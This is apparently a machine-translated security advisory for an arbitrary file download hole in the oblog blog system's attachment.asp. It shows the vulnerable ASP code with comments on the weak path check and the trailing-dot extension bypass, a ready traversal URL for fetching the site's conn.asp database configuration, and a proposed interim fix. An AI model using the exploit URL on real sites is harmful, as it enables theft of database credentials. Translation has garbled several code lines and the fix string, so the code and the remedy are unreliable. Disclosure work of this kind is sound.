Path = Trim (Request ("path")) ' Get the path submitted by the user
Fileid = Trim (Request ("Fileid"))
If Fileid = "" and Path = "" Then
Response.Write "Insufficient Parameters"
Response.End
End If
...
If checkdownload Or 1= 1Then
If Path = "" Then
Set rs = Server.CreateObject ("ADODB.") RecordSet ")
Link_database
SQL = ("Select File_path,userid,file_ext,viewnum from oblog_upfile WHERE Fileid =" &clng (Fileid))
Rs.Open sql,conn,1,3
If not Rs. Eof Then
UID = RS (1)
File_ext = RS (2)
RS ("viewnum") = RS ("Viewnum") + 1
Rs. Update
DownloadFile Server.MapPath (RS (0)), 0
Else
response.status=404
Response.Write "This attachment does not exist!"
End If
Rs. Close
Set rs = Nothing
Else
If INSTR (path,oblog.cacheconfig) > 0 Then ' tr4c3 callout: note here, just to determine whether the path that the user submitted contains Uploadfiles, call the DownloadFile function download file for true
DownloadFile Server.MapPath (Path), 1
End If
End If
Else
' If the attachment is a picture, call a default picture when permission check fails, prevent tag from being invoked, affect the display effect
If Path = "" Then
response.status=403
Response.Write Showdownerr
Response.End
Else
DownloadFile Server.MapPath (blogdir& "Images/oblog_powered.gif"), 1
End If
End If
Set Oblog = Nothing
Sub DownloadFile (Strfile,stype)
On Error Resume Next
server.scripttimeout=9999999
Dim S,fso,f,intfilelength,strfilename
strFileName = strfile
Response.Clear
Set s = Server.CreateObject (Oblog. Cachecompont (2))
S.open
S.type = 1
Set FSO = Server.CreateObject (oblog. Cachecompont (1))
If not FSO. FileExists (strFileName) Then
If stype = 0 Then
response.status=404
Response.Write "The attachment has been removed!"
Exit Sub
Else
strFileName = Server.MapPath (blogdir& "Images/nopic.gif")
End If
End If
Set f = fso. GetFile (strFileName)
Intfilelength = F.size
S.loadfromfile (strFileName)
If ERR Then
Response.Write ("Response.End
End If
Set fso=nothing
Dim Data
Data=s.read
S.close
Set s=nothing
Dim ContentType
Select Case LCase (Right (strfile, 4))
Case ". asp", ". mdb", ". config", ". js" ' tr4c3 callout: Look here again, remember what came? By the way, I made a boiling forecast the other day. The free download vulnerability of the news system is similar to that of the inspection method [http://www.tr4c3.com/post/306.html], and the use of the method is similarly, magical "." Came in handy again.
Exit Sub
Case ". asf"
ContentType = "VIDEO/X-MS-ASF"
Case ". avi"
ContentType = "Video/avi"
Case ". Doc"
ContentType = "Application/msword"
Case ". zip"
ContentType = "Application/zip"
Case ". xls"
ContentType = "Application/vnd.ms-excel"
Case ". gif"
ContentType = "Image/gif"
Case ". jpg", "JPEG"
ContentType = "Image/jpeg"
Case ". wav"
ContentType = "Audio/wav"
Case ". mp3"
ContentType = "Audio/mpeg3"
Case ". mpg", "MPEG"
ContentType = "Video/mpeg"
Case ". rtf"
ContentType = "Application/rtf"
Case ". htm", "html"
ContentType = "Text/html"
Case ". txt"
ContentType = "Text/plain"
Case Else
ContentType = "Application/octet-stream"
End Select
If response.isclientconnected Then
If Not (InStr LCase (F.name), ". gif") >0 or InStr (LCase (F.name), ". jpg") >0 or InStr (LCase (F.name), ". jpeg") >0 or InStr (LCase (F.name), ". bmp") >0 Or InStr (LCase (F.name), ". png") >0) Then
Response.AddHeader "Content-disposition", "attachment"; Filename= "& F.name
End If
Response.AddHeader "Content-length", intfilelength
Response.Charset = "UTF-8"
Response.ContentType = ContentType
Response.BinaryWrite Data
Response.Flush
Response.Clear ()
End If
End Sub
<* Reference:
Tr4c3[at]126[dot]com
*>
Test method:
Warning
The following procedures (methods) may be offensive, only for security research and teaching purposes. Risk Ego!
########################################################################
How to use:
Http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
Suggestions:
Patching recommendations:
Wait for the official release of the new patch.
########################################################################
Interim solution:
Convert attachment.asp 5th line path = Trim (Request ("path")) to Path = Replace (Trim (Request ("path"), "...", "")
########################################################################
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
